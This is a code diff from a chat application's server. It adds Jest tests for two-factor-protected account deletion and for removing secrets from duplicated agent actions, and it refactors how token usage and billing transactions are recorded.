it('returns error when 2FA is enabled and verification fails with 400', async () => {
|
||||||
|
const req = { user: { id: 'user1', _id: 'user1' }, body: {} };
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue({
|
||||||
|
_id: 'user1',
|
||||||
|
twoFactorEnabled: true,
|
||||||
|
totpSecret: 'enc-secret',
|
||||||
|
});
|
||||||
|
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
|
||||||
|
|
||||||
|
await deleteUserController(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(400);
|
||||||
|
expect(mockDeleteMessages).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('returns 401 when 2FA is enabled and invalid TOTP token provided', async () => {
|
||||||
|
const existingUser = {
|
||||||
|
_id: 'user1',
|
||||||
|
twoFactorEnabled: true,
|
||||||
|
totpSecret: 'enc-secret',
|
||||||
|
};
|
||||||
|
const req = { user: { id: 'user1', _id: 'user1' }, body: { token: 'wrong' } };
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue(existingUser);
|
||||||
|
mockVerifyOTPOrBackupCode.mockResolvedValue({
|
||||||
|
verified: false,
|
||||||
|
status: 401,
|
||||||
|
message: 'Invalid token or backup code',
|
||||||
|
});
|
||||||
|
|
||||||
|
await deleteUserController(req, res);
|
||||||
|
|
||||||
|
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
|
||||||
|
user: existingUser,
|
||||||
|
token: 'wrong',
|
||||||
|
backupCode: undefined,
|
||||||
|
});
|
||||||
|
expect(res.status).toHaveBeenCalledWith(401);
|
||||||
|
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
|
||||||
|
expect(mockDeleteMessages).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('returns 401 when 2FA is enabled and invalid backup code provided', async () => {
|
||||||
|
const existingUser = {
|
||||||
|
_id: 'user1',
|
||||||
|
twoFactorEnabled: true,
|
||||||
|
totpSecret: 'enc-secret',
|
||||||
|
backupCodes: [],
|
||||||
|
};
|
||||||
|
const req = { user: { id: 'user1', _id: 'user1' }, body: { backupCode: 'bad-code' } };
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue(existingUser);
|
||||||
|
mockVerifyOTPOrBackupCode.mockResolvedValue({
|
||||||
|
verified: false,
|
||||||
|
status: 401,
|
||||||
|
message: 'Invalid token or backup code',
|
||||||
|
});
|
||||||
|
|
||||||
|
await deleteUserController(req, res);
|
||||||
|
|
||||||
|
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
|
||||||
|
user: existingUser,
|
||||||
|
token: undefined,
|
||||||
|
backupCode: 'bad-code',
|
||||||
|
});
|
||||||
|
expect(res.status).toHaveBeenCalledWith(401);
|
||||||
|
expect(mockDeleteMessages).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('deletes account when valid TOTP token provided with 2FA enabled', async () => {
|
||||||
|
const existingUser = {
|
||||||
|
_id: 'user1',
|
||||||
|
twoFactorEnabled: true,
|
||||||
|
totpSecret: 'enc-secret',
|
||||||
|
};
|
||||||
|
const req = {
|
||||||
|
user: { id: 'user1', _id: 'user1', email: 'a@b.com' },
|
||||||
|
body: { token: '123456' },
|
||||||
|
};
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue(existingUser);
|
||||||
|
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
|
||||||
|
|
||||||
|
await deleteUserController(req, res);
|
||||||
|
|
||||||
|
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
|
||||||
|
user: existingUser,
|
||||||
|
token: '123456',
|
||||||
|
backupCode: undefined,
|
||||||
|
});
|
||||||
|
expect(res.status).toHaveBeenCalledWith(200);
|
||||||
|
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
|
||||||
|
expect(mockDeleteMessages).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('deletes account when valid backup code provided with 2FA enabled', async () => {
|
||||||
|
const existingUser = {
|
||||||
|
_id: 'user1',
|
||||||
|
twoFactorEnabled: true,
|
||||||
|
totpSecret: 'enc-secret',
|
||||||
|
backupCodes: [{ codeHash: 'h1', used: false }],
|
||||||
|
};
|
||||||
|
const req = {
|
||||||
|
user: { id: 'user1', _id: 'user1', email: 'a@b.com' },
|
||||||
|
body: { backupCode: 'valid-code' },
|
||||||
|
};
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue(existingUser);
|
||||||
|
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
|
||||||
|
|
||||||
|
await deleteUserController(req, res);
|
||||||
|
|
||||||
|
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
|
||||||
|
user: existingUser,
|
||||||
|
token: undefined,
|
||||||
|
backupCode: 'valid-code',
|
||||||
|
});
|
||||||
|
expect(res.status).toHaveBeenCalledWith(200);
|
||||||
|
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
|
||||||
|
expect(mockDeleteMessages).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -82,6 +82,13 @@ jest.mock('~/models/spendTokens', () => ({
|
||||||
spendStructuredTokens: mockSpendStructuredTokens,
|
spendStructuredTokens: mockSpendStructuredTokens,
|
||||||
}));
|
}));
|
||||||
|
|
||||||
|
const mockGetMultiplier = jest.fn().mockReturnValue(1);
|
||||||
|
const mockGetCacheMultiplier = jest.fn().mockReturnValue(null);
|
||||||
|
jest.mock('~/models/tx', () => ({
|
||||||
|
getMultiplier: mockGetMultiplier,
|
||||||
|
getCacheMultiplier: mockGetCacheMultiplier,
|
||||||
|
}));
|
||||||
|
|
||||||
jest.mock('~/server/controllers/agents/callbacks', () => ({
|
jest.mock('~/server/controllers/agents/callbacks', () => ({
|
||||||
createToolEndCallback: jest.fn().mockReturnValue(jest.fn()),
|
createToolEndCallback: jest.fn().mockReturnValue(jest.fn()),
|
||||||
}));
|
}));
|
||||||
|
|
@ -103,6 +110,8 @@ jest.mock('~/models/Agent', () => ({
|
||||||
getAgents: jest.fn().mockResolvedValue([]),
|
getAgents: jest.fn().mockResolvedValue([]),
|
||||||
}));
|
}));
|
||||||
|
|
||||||
|
const mockUpdateBalance = jest.fn().mockResolvedValue({});
|
||||||
|
const mockBulkInsertTransactions = jest.fn().mockResolvedValue(undefined);
|
||||||
jest.mock('~/models', () => ({
|
jest.mock('~/models', () => ({
|
||||||
getFiles: jest.fn(),
|
getFiles: jest.fn(),
|
||||||
getUserKey: jest.fn(),
|
getUserKey: jest.fn(),
|
||||||
|
|
@ -112,6 +121,8 @@ jest.mock('~/models', () => ({
|
||||||
getUserCodeFiles: jest.fn(),
|
getUserCodeFiles: jest.fn(),
|
||||||
getToolFilesByIds: jest.fn(),
|
getToolFilesByIds: jest.fn(),
|
||||||
getCodeGeneratedFiles: jest.fn(),
|
getCodeGeneratedFiles: jest.fn(),
|
||||||
|
updateBalance: mockUpdateBalance,
|
||||||
|
bulkInsertTransactions: mockBulkInsertTransactions,
|
||||||
}));
|
}));
|
||||||
|
|
||||||
describe('OpenAIChatCompletionController', () => {
|
describe('OpenAIChatCompletionController', () => {
|
||||||
|
|
@ -155,7 +166,15 @@ describe('OpenAIChatCompletionController', () => {
|
||||||
|
|
||||||
expect(mockRecordCollectedUsage).toHaveBeenCalledTimes(1);
|
expect(mockRecordCollectedUsage).toHaveBeenCalledTimes(1);
|
||||||
expect(mockRecordCollectedUsage).toHaveBeenCalledWith(
|
expect(mockRecordCollectedUsage).toHaveBeenCalledWith(
|
||||||
{ spendTokens: mockSpendTokens, spendStructuredTokens: mockSpendStructuredTokens },
|
{
|
||||||
|
spendTokens: mockSpendTokens,
|
||||||
|
spendStructuredTokens: mockSpendStructuredTokens,
|
||||||
|
pricing: { getMultiplier: mockGetMultiplier, getCacheMultiplier: mockGetCacheMultiplier },
|
||||||
|
bulkWriteOps: {
|
||||||
|
insertMany: mockBulkInsertTransactions,
|
||||||
|
updateBalance: mockUpdateBalance,
|
||||||
|
},
|
||||||
|
},
|
||||||
expect.objectContaining({
|
expect.objectContaining({
|
||||||
user: 'user-123',
|
user: 'user-123',
|
||||||
conversationId: expect.any(String),
|
conversationId: expect.any(String),
|
||||||
|
|
@ -182,12 +201,18 @@ describe('OpenAIChatCompletionController', () => {
|
||||||
);
|
);
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should pass spendTokens and spendStructuredTokens as dependencies', async () => {
|
it('should pass spendTokens, spendStructuredTokens, pricing, and bulkWriteOps as dependencies', async () => {
|
||||||
await OpenAIChatCompletionController(req, res);
|
await OpenAIChatCompletionController(req, res);
|
||||||
|
|
||||||
const [deps] = mockRecordCollectedUsage.mock.calls[0];
|
const [deps] = mockRecordCollectedUsage.mock.calls[0];
|
||||||
expect(deps).toHaveProperty('spendTokens', mockSpendTokens);
|
expect(deps).toHaveProperty('spendTokens', mockSpendTokens);
|
||||||
expect(deps).toHaveProperty('spendStructuredTokens', mockSpendStructuredTokens);
|
expect(deps).toHaveProperty('spendStructuredTokens', mockSpendStructuredTokens);
|
||||||
|
expect(deps).toHaveProperty('pricing');
|
||||||
|
expect(deps.pricing).toHaveProperty('getMultiplier', mockGetMultiplier);
|
||||||
|
expect(deps.pricing).toHaveProperty('getCacheMultiplier', mockGetCacheMultiplier);
|
||||||
|
expect(deps).toHaveProperty('bulkWriteOps');
|
||||||
|
expect(deps.bulkWriteOps).toHaveProperty('insertMany', mockBulkInsertTransactions);
|
||||||
|
expect(deps.bulkWriteOps).toHaveProperty('updateBalance', mockUpdateBalance);
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should include model from primaryConfig in recordCollectedUsage params', async () => {
|
it('should include model from primaryConfig in recordCollectedUsage params', async () => {
|
||||||
|
|
|
||||||
|
|
@ -106,6 +106,13 @@ jest.mock('~/models/spendTokens', () => ({
|
||||||
spendStructuredTokens: mockSpendStructuredTokens,
|
spendStructuredTokens: mockSpendStructuredTokens,
|
||||||
}));
|
}));
|
||||||
|
|
||||||
|
const mockGetMultiplier = jest.fn().mockReturnValue(1);
|
||||||
|
const mockGetCacheMultiplier = jest.fn().mockReturnValue(null);
|
||||||
|
jest.mock('~/models/tx', () => ({
|
||||||
|
getMultiplier: mockGetMultiplier,
|
||||||
|
getCacheMultiplier: mockGetCacheMultiplier,
|
||||||
|
}));
|
||||||
|
|
||||||
jest.mock('~/server/controllers/agents/callbacks', () => ({
|
jest.mock('~/server/controllers/agents/callbacks', () => ({
|
||||||
createToolEndCallback: jest.fn().mockReturnValue(jest.fn()),
|
createToolEndCallback: jest.fn().mockReturnValue(jest.fn()),
|
||||||
createResponsesToolEndCallback: jest.fn().mockReturnValue(jest.fn()),
|
createResponsesToolEndCallback: jest.fn().mockReturnValue(jest.fn()),
|
||||||
|
|
@ -131,6 +138,8 @@ jest.mock('~/models/Agent', () => ({
|
||||||
getAgents: jest.fn().mockResolvedValue([]),
|
getAgents: jest.fn().mockResolvedValue([]),
|
||||||
}));
|
}));
|
||||||
|
|
||||||
|
const mockUpdateBalance = jest.fn().mockResolvedValue({});
|
||||||
|
const mockBulkInsertTransactions = jest.fn().mockResolvedValue(undefined);
|
||||||
jest.mock('~/models', () => ({
|
jest.mock('~/models', () => ({
|
||||||
getFiles: jest.fn(),
|
getFiles: jest.fn(),
|
||||||
getUserKey: jest.fn(),
|
getUserKey: jest.fn(),
|
||||||
|
|
@ -141,6 +150,8 @@ jest.mock('~/models', () => ({
|
||||||
getUserCodeFiles: jest.fn(),
|
getUserCodeFiles: jest.fn(),
|
||||||
getToolFilesByIds: jest.fn(),
|
getToolFilesByIds: jest.fn(),
|
||||||
getCodeGeneratedFiles: jest.fn(),
|
getCodeGeneratedFiles: jest.fn(),
|
||||||
|
updateBalance: mockUpdateBalance,
|
||||||
|
bulkInsertTransactions: mockBulkInsertTransactions,
|
||||||
}));
|
}));
|
||||||
|
|
||||||
describe('createResponse controller', () => {
|
describe('createResponse controller', () => {
|
||||||
|
|
@ -184,7 +195,15 @@ describe('createResponse controller', () => {
|
||||||
|
|
||||||
expect(mockRecordCollectedUsage).toHaveBeenCalledTimes(1);
|
expect(mockRecordCollectedUsage).toHaveBeenCalledTimes(1);
|
||||||
expect(mockRecordCollectedUsage).toHaveBeenCalledWith(
|
expect(mockRecordCollectedUsage).toHaveBeenCalledWith(
|
||||||
{ spendTokens: mockSpendTokens, spendStructuredTokens: mockSpendStructuredTokens },
|
{
|
||||||
|
spendTokens: mockSpendTokens,
|
||||||
|
spendStructuredTokens: mockSpendStructuredTokens,
|
||||||
|
pricing: { getMultiplier: mockGetMultiplier, getCacheMultiplier: mockGetCacheMultiplier },
|
||||||
|
bulkWriteOps: {
|
||||||
|
insertMany: mockBulkInsertTransactions,
|
||||||
|
updateBalance: mockUpdateBalance,
|
||||||
|
},
|
||||||
|
},
|
||||||
expect.objectContaining({
|
expect.objectContaining({
|
||||||
user: 'user-123',
|
user: 'user-123',
|
||||||
conversationId: expect.any(String),
|
conversationId: expect.any(String),
|
||||||
|
|
@ -209,12 +228,18 @@ describe('createResponse controller', () => {
|
||||||
);
|
);
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should pass spendTokens and spendStructuredTokens as dependencies', async () => {
|
it('should pass spendTokens, spendStructuredTokens, pricing, and bulkWriteOps as dependencies', async () => {
|
||||||
await createResponse(req, res);
|
await createResponse(req, res);
|
||||||
|
|
||||||
const [deps] = mockRecordCollectedUsage.mock.calls[0];
|
const [deps] = mockRecordCollectedUsage.mock.calls[0];
|
||||||
expect(deps).toHaveProperty('spendTokens', mockSpendTokens);
|
expect(deps).toHaveProperty('spendTokens', mockSpendTokens);
|
||||||
expect(deps).toHaveProperty('spendStructuredTokens', mockSpendStructuredTokens);
|
expect(deps).toHaveProperty('spendStructuredTokens', mockSpendStructuredTokens);
|
||||||
|
expect(deps).toHaveProperty('pricing');
|
||||||
|
expect(deps.pricing).toHaveProperty('getMultiplier', mockGetMultiplier);
|
||||||
|
expect(deps.pricing).toHaveProperty('getCacheMultiplier', mockGetCacheMultiplier);
|
||||||
|
expect(deps).toHaveProperty('bulkWriteOps');
|
||||||
|
expect(deps.bulkWriteOps).toHaveProperty('insertMany', mockBulkInsertTransactions);
|
||||||
|
expect(deps.bulkWriteOps).toHaveProperty('updateBalance', mockUpdateBalance);
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should include model from primaryConfig in recordCollectedUsage params', async () => {
|
it('should include model from primaryConfig in recordCollectedUsage params', async () => {
|
||||||
|
|
@ -244,7 +269,15 @@ describe('createResponse controller', () => {
|
||||||
|
|
||||||
expect(mockRecordCollectedUsage).toHaveBeenCalledTimes(1);
|
expect(mockRecordCollectedUsage).toHaveBeenCalledTimes(1);
|
||||||
expect(mockRecordCollectedUsage).toHaveBeenCalledWith(
|
expect(mockRecordCollectedUsage).toHaveBeenCalledWith(
|
||||||
{ spendTokens: mockSpendTokens, spendStructuredTokens: mockSpendStructuredTokens },
|
{
|
||||||
|
spendTokens: mockSpendTokens,
|
||||||
|
spendStructuredTokens: mockSpendStructuredTokens,
|
||||||
|
pricing: { getMultiplier: mockGetMultiplier, getCacheMultiplier: mockGetCacheMultiplier },
|
||||||
|
bulkWriteOps: {
|
||||||
|
insertMany: mockBulkInsertTransactions,
|
||||||
|
updateBalance: mockUpdateBalance,
|
||||||
|
},
|
||||||
|
},
|
||||||
expect.objectContaining({
|
expect.objectContaining({
|
||||||
user: 'user-123',
|
user: 'user-123',
|
||||||
context: 'message',
|
context: 'message',
|
||||||
|
|
|
||||||
|
|
@ -0,0 +1,159 @@
|
||||||
|
jest.mock('~/server/services/PermissionService', () => ({
|
||||||
|
findPubliclyAccessibleResources: jest.fn(),
|
||||||
|
findAccessibleResources: jest.fn(),
|
||||||
|
hasPublicPermission: jest.fn(),
|
||||||
|
grantPermission: jest.fn().mockResolvedValue({}),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Config', () => ({
|
||||||
|
getCachedTools: jest.fn(),
|
||||||
|
getMCPServerTools: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
const mongoose = require('mongoose');
|
||||||
|
const { actionDelimiter } = require('librechat-data-provider');
|
||||||
|
const { agentSchema, actionSchema } = require('@librechat/data-schemas');
|
||||||
|
const { MongoMemoryServer } = require('mongodb-memory-server');
|
||||||
|
const { duplicateAgent } = require('../v1');
|
||||||
|
|
||||||
|
let mongoServer;
|
||||||
|
|
||||||
|
beforeAll(async () => {
|
||||||
|
mongoServer = await MongoMemoryServer.create();
|
||||||
|
const mongoUri = mongoServer.getUri();
|
||||||
|
if (!mongoose.models.Agent) {
|
||||||
|
mongoose.model('Agent', agentSchema);
|
||||||
|
}
|
||||||
|
if (!mongoose.models.Action) {
|
||||||
|
mongoose.model('Action', actionSchema);
|
||||||
|
}
|
||||||
|
await mongoose.connect(mongoUri);
|
||||||
|
}, 20000);
|
||||||
|
|
||||||
|
afterAll(async () => {
|
||||||
|
await mongoose.disconnect();
|
||||||
|
await mongoServer.stop();
|
||||||
|
});
|
||||||
|
|
||||||
|
beforeEach(async () => {
|
||||||
|
await mongoose.models.Agent.deleteMany({});
|
||||||
|
await mongoose.models.Action.deleteMany({});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('duplicateAgentHandler — action domain extraction', () => {
|
||||||
|
it('builds duplicated action entries using metadata.domain, not action_id', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const originalAgentId = `agent_original`;
|
||||||
|
|
||||||
|
const agent = await mongoose.models.Agent.create({
|
||||||
|
id: originalAgentId,
|
||||||
|
name: 'Test Agent',
|
||||||
|
author: userId.toString(),
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
tools: [],
|
||||||
|
actions: [`api.example.com${actionDelimiter}act_original`],
|
||||||
|
versions: [{ name: 'Test Agent', createdAt: new Date(), updatedAt: new Date() }],
|
||||||
|
});
|
||||||
|
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_original',
|
||||||
|
agent_id: originalAgentId,
|
||||||
|
metadata: { domain: 'api.example.com' },
|
||||||
|
});
|
||||||
|
|
||||||
|
const req = {
|
||||||
|
params: { id: agent.id },
|
||||||
|
user: { id: userId.toString() },
|
||||||
|
};
|
||||||
|
const res = {
|
||||||
|
status: jest.fn().mockReturnThis(),
|
||||||
|
json: jest.fn(),
|
||||||
|
};
|
||||||
|
|
||||||
|
await duplicateAgent(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(201);
|
||||||
|
|
||||||
|
const { agent: newAgent, actions: newActions } = res.json.mock.calls[0][0];
|
||||||
|
|
||||||
|
expect(newAgent.id).not.toBe(originalAgentId);
|
||||||
|
expect(String(newAgent.author)).toBe(userId.toString());
|
||||||
|
expect(newActions).toHaveLength(1);
|
||||||
|
expect(newActions[0].metadata.domain).toBe('api.example.com');
|
||||||
|
expect(newActions[0].agent_id).toBe(newAgent.id);
|
||||||
|
|
||||||
|
for (const actionEntry of newAgent.actions) {
|
||||||
|
const [domain, actionId] = actionEntry.split(actionDelimiter);
|
||||||
|
expect(domain).toBe('api.example.com');
|
||||||
|
expect(actionId).toBeTruthy();
|
||||||
|
expect(actionId).not.toBe('act_original');
|
||||||
|
}
|
||||||
|
|
||||||
|
const allActions = await mongoose.models.Action.find({}).lean();
|
||||||
|
expect(allActions).toHaveLength(2);
|
||||||
|
|
||||||
|
const originalAction = allActions.find((a) => a.action_id === 'act_original');
|
||||||
|
expect(originalAction.agent_id).toBe(originalAgentId);
|
||||||
|
|
||||||
|
const duplicatedAction = allActions.find((a) => a.action_id !== 'act_original');
|
||||||
|
expect(duplicatedAction.agent_id).toBe(newAgent.id);
|
||||||
|
expect(duplicatedAction.metadata.domain).toBe('api.example.com');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('strips sensitive metadata fields from duplicated actions', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const originalAgentId = 'agent_sensitive';
|
||||||
|
|
||||||
|
await mongoose.models.Agent.create({
|
||||||
|
id: originalAgentId,
|
||||||
|
name: 'Sensitive Agent',
|
||||||
|
author: userId.toString(),
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
tools: [],
|
||||||
|
actions: [`secure.api.com${actionDelimiter}act_secret`],
|
||||||
|
versions: [{ name: 'Sensitive Agent', createdAt: new Date(), updatedAt: new Date() }],
|
||||||
|
});
|
||||||
|
|
||||||
|
await mongoose.models.Action.create({
|
||||||
|
user: userId,
|
||||||
|
action_id: 'act_secret',
|
||||||
|
agent_id: originalAgentId,
|
||||||
|
metadata: {
|
||||||
|
domain: 'secure.api.com',
|
||||||
|
api_key: 'sk-secret-key-12345',
|
||||||
|
oauth_client_id: 'client_id_xyz',
|
||||||
|
oauth_client_secret: 'client_secret_xyz',
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
const req = {
|
||||||
|
params: { id: originalAgentId },
|
||||||
|
user: { id: userId.toString() },
|
||||||
|
};
|
||||||
|
const res = {
|
||||||
|
status: jest.fn().mockReturnThis(),
|
||||||
|
json: jest.fn(),
|
||||||
|
};
|
||||||
|
|
||||||
|
await duplicateAgent(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(201);
|
||||||
|
|
||||||
|
const duplicatedAction = await mongoose.models.Action.findOne({
|
||||||
|
agent_id: { $ne: originalAgentId },
|
||||||
|
}).lean();
|
||||||
|
|
||||||
|
expect(duplicatedAction.metadata.domain).toBe('secure.api.com');
|
||||||
|
expect(duplicatedAction.metadata.api_key).toBeUndefined();
|
||||||
|
expect(duplicatedAction.metadata.oauth_client_id).toBeUndefined();
|
||||||
|
expect(duplicatedAction.metadata.oauth_client_secret).toBeUndefined();
|
||||||
|
|
||||||
|
const originalAction = await mongoose.models.Action.findOne({
|
||||||
|
action_id: 'act_secret',
|
||||||
|
}).lean();
|
||||||
|
expect(originalAction.metadata.api_key).toBe('sk-secret-key-12345');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -13,11 +13,12 @@ const {
|
||||||
createSafeUser,
|
createSafeUser,
|
||||||
initializeAgent,
|
initializeAgent,
|
||||||
getBalanceConfig,
|
getBalanceConfig,
|
||||||
getProviderConfig,
|
|
||||||
omitTitleOptions,
|
omitTitleOptions,
|
||||||
|
getProviderConfig,
|
||||||
memoryInstructions,
|
memoryInstructions,
|
||||||
applyContextToAgent,
|
|
||||||
createTokenCounter,
|
createTokenCounter,
|
||||||
|
applyContextToAgent,
|
||||||
|
recordCollectedUsage,
|
||||||
GenerationJobManager,
|
GenerationJobManager,
|
||||||
getTransactionsConfig,
|
getTransactionsConfig,
|
||||||
createMemoryProcessor,
|
createMemoryProcessor,
|
||||||
|
|
@ -43,8 +44,11 @@ const {
|
||||||
isEphemeralAgentId,
|
isEphemeralAgentId,
|
||||||
removeNullishValues,
|
removeNullishValues,
|
||||||
} = require('librechat-data-provider');
|
} = require('librechat-data-provider');
|
||||||
|
const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions');
|
||||||
const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens');
|
const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens');
|
||||||
const { encodeAndFormat } = require('~/server/services/Files/images/encode');
|
const { encodeAndFormat } = require('~/server/services/Files/images/encode');
|
||||||
|
const { updateBalance, bulkInsertTransactions } = require('~/models');
|
||||||
|
const { getMultiplier, getCacheMultiplier } = require('~/models/tx');
|
||||||
const { createContextHandlers } = require('~/app/clients/prompts');
|
const { createContextHandlers } = require('~/app/clients/prompts');
|
||||||
const { getConvoFiles } = require('~/models/Conversation');
|
const { getConvoFiles } = require('~/models/Conversation');
|
||||||
const BaseClient = require('~/app/clients/BaseClient');
|
const BaseClient = require('~/app/clients/BaseClient');
|
||||||
|
|
@ -476,6 +480,7 @@ class AgentClient extends BaseClient {
|
||||||
getUserKeyValues: db.getUserKeyValues,
|
getUserKeyValues: db.getUserKeyValues,
|
||||||
getToolFilesByIds: db.getToolFilesByIds,
|
getToolFilesByIds: db.getToolFilesByIds,
|
||||||
getCodeGeneratedFiles: db.getCodeGeneratedFiles,
|
getCodeGeneratedFiles: db.getCodeGeneratedFiles,
|
||||||
|
filterFilesByAgentAccess,
|
||||||
},
|
},
|
||||||
);
|
);
|
||||||
|
|
||||||
|
|
@ -624,82 +629,29 @@ class AgentClient extends BaseClient {
|
||||||
context = 'message',
|
context = 'message',
|
||||||
collectedUsage = this.collectedUsage,
|
collectedUsage = this.collectedUsage,
|
||||||
}) {
|
}) {
|
||||||
if (!collectedUsage || !collectedUsage.length) {
|
const result = await recordCollectedUsage(
|
||||||
return;
|
{
|
||||||
}
|
spendTokens,
|
||||||
// Use first entry's input_tokens as the base input (represents initial user message context)
|
spendStructuredTokens,
|
||||||
// Support both OpenAI format (input_token_details) and Anthropic format (cache_*_input_tokens)
|
pricing: { getMultiplier, getCacheMultiplier },
|
||||||
const firstUsage = collectedUsage[0];
|
bulkWriteOps: { insertMany: bulkInsertTransactions, updateBalance },
|
||||||
const input_tokens =
|
},
|
||||||
(firstUsage?.input_tokens || 0) +
|
{
|
||||||
(Number(firstUsage?.input_token_details?.cache_creation) ||
|
user: this.user ?? this.options.req.user?.id,
|
||||||
Number(firstUsage?.cache_creation_input_tokens) ||
|
conversationId: this.conversationId,
|
||||||
0) +
|
collectedUsage,
|
||||||
(Number(firstUsage?.input_token_details?.cache_read) ||
|
model: model ?? this.model ?? this.options.agent.model_parameters.model,
|
||||||
Number(firstUsage?.cache_read_input_tokens) ||
|
|
||||||
0);
|
|
||||||
|
|
||||||
// Sum output_tokens directly from all entries - works for both sequential and parallel execution
|
|
||||||
// This avoids the incremental calculation that produced negative values for parallel agents
|
|
||||||
let total_output_tokens = 0;
|
|
||||||
|
|
||||||
for (const usage of collectedUsage) {
|
|
||||||
if (!usage) {
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
|
|
||||||
// Support both OpenAI format (input_token_details) and Anthropic format (cache_*_input_tokens)
|
|
||||||
const cache_creation =
|
|
||||||
Number(usage.input_token_details?.cache_creation) ||
|
|
||||||
Number(usage.cache_creation_input_tokens) ||
|
|
||||||
0;
|
|
||||||
const cache_read =
|
|
||||||
Number(usage.input_token_details?.cache_read) || Number(usage.cache_read_input_tokens) || 0;
|
|
||||||
|
|
||||||
// Accumulate output tokens for the usage summary
|
|
||||||
total_output_tokens += Number(usage.output_tokens) || 0;
|
|
||||||
|
|
||||||
const txMetadata = {
|
|
||||||
context,
|
context,
|
||||||
|
messageId: this.responseMessageId,
|
||||||
balance,
|
balance,
|
||||||
transactions,
|
transactions,
|
||||||
conversationId: this.conversationId,
|
|
||||||
user: this.user ?? this.options.req.user?.id,
|
|
||||||
endpointTokenConfig: this.options.endpointTokenConfig,
|
endpointTokenConfig: this.options.endpointTokenConfig,
|
||||||
model: usage.model ?? model ?? this.model ?? this.options.agent.model_parameters.model,
|
|
||||||
};
|
|
||||||
|
|
||||||
if (cache_creation > 0 || cache_read > 0) {
|
|
||||||
spendStructuredTokens(txMetadata, {
|
|
||||||
promptTokens: {
|
|
||||||
input: usage.input_tokens,
|
|
||||||
write: cache_creation,
|
|
||||||
read: cache_read,
|
|
||||||
},
|
},
|
||||||
completionTokens: usage.output_tokens,
|
|
||||||
}).catch((err) => {
|
|
||||||
logger.error(
|
|
||||||
'[api/server/controllers/agents/client.js #recordCollectedUsage] Error spending structured tokens',
|
|
||||||
err,
|
|
||||||
);
|
);
|
||||||
});
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
spendTokens(txMetadata, {
|
|
||||||
promptTokens: usage.input_tokens,
|
|
||||||
completionTokens: usage.output_tokens,
|
|
||||||
}).catch((err) => {
|
|
||||||
logger.error(
|
|
||||||
'[api/server/controllers/agents/client.js #recordCollectedUsage] Error spending tokens',
|
|
||||||
err,
|
|
||||||
);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
|
|
||||||
this.usage = {
|
if (result) {
|
||||||
input_tokens,
|
this.usage = result;
|
||||||
output_tokens: total_output_tokens,
|
}
|
||||||
};
|
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
|
|
@ -891,9 +843,10 @@ class AgentClient extends BaseClient {
|
||||||
config.signal = null;
|
config.signal = null;
|
||||||
};
|
};
|
||||||
|
|
||||||
|
const hideSequentialOutputs = config.configurable.hide_sequential_outputs;
|
||||||
await runAgents(initialMessages);
|
await runAgents(initialMessages);
|
||||||
/** @deprecated Agent Chain */
|
/** @deprecated Agent Chain */
|
||||||
if (config.configurable.hide_sequential_outputs) {
|
if (hideSequentialOutputs) {
|
||||||
this.contentParts = this.contentParts.filter((part, index) => {
|
this.contentParts = this.contentParts.filter((part, index) => {
|
||||||
// Include parts that are either:
|
// Include parts that are either:
|
||||||
// 1. At or after the finalContentStart index
|
// 1. At or after the finalContentStart index
|
||||||
|
|
@ -1147,6 +1100,7 @@ class AgentClient extends BaseClient {
|
||||||
model: clientOptions.model,
|
model: clientOptions.model,
|
||||||
balance: balanceConfig,
|
balance: balanceConfig,
|
||||||
transactions: transactionsConfig,
|
transactions: transactionsConfig,
|
||||||
|
messageId: this.responseMessageId,
|
||||||
}).catch((err) => {
|
}).catch((err) => {
|
||||||
logger.error(
|
logger.error(
|
||||||
'[api/server/controllers/agents/client.js #titleConvo] Error recording collected usage',
|
